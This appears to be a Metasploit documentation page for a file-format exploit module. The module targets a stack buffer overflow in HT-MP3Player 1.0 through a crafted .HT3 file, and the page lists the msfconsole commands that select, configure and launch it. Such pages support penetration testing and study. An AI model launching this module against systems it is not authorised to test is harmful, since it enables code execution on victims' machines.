HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow

Disclosed

Description

This module exploits a stack buffer overflow in HT-MP3Player 1.0. Arbitrary code execution could occur when parsing a specially crafted .HT3 file. NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file.

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/windows/fileformat/ht_mp3player_ht3_bof
msf exploit(ht_mp3player_ht3_bof) > show targets
    ...targets...
msf exploit(ht_mp3player_ht3_bof) > set TARGET < target-id >
msf exploit(ht_mp3player_ht3_bof) > show options
    ...show and set options...
msf exploit(ht_mp3player_ht3_bof) > exploit

Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
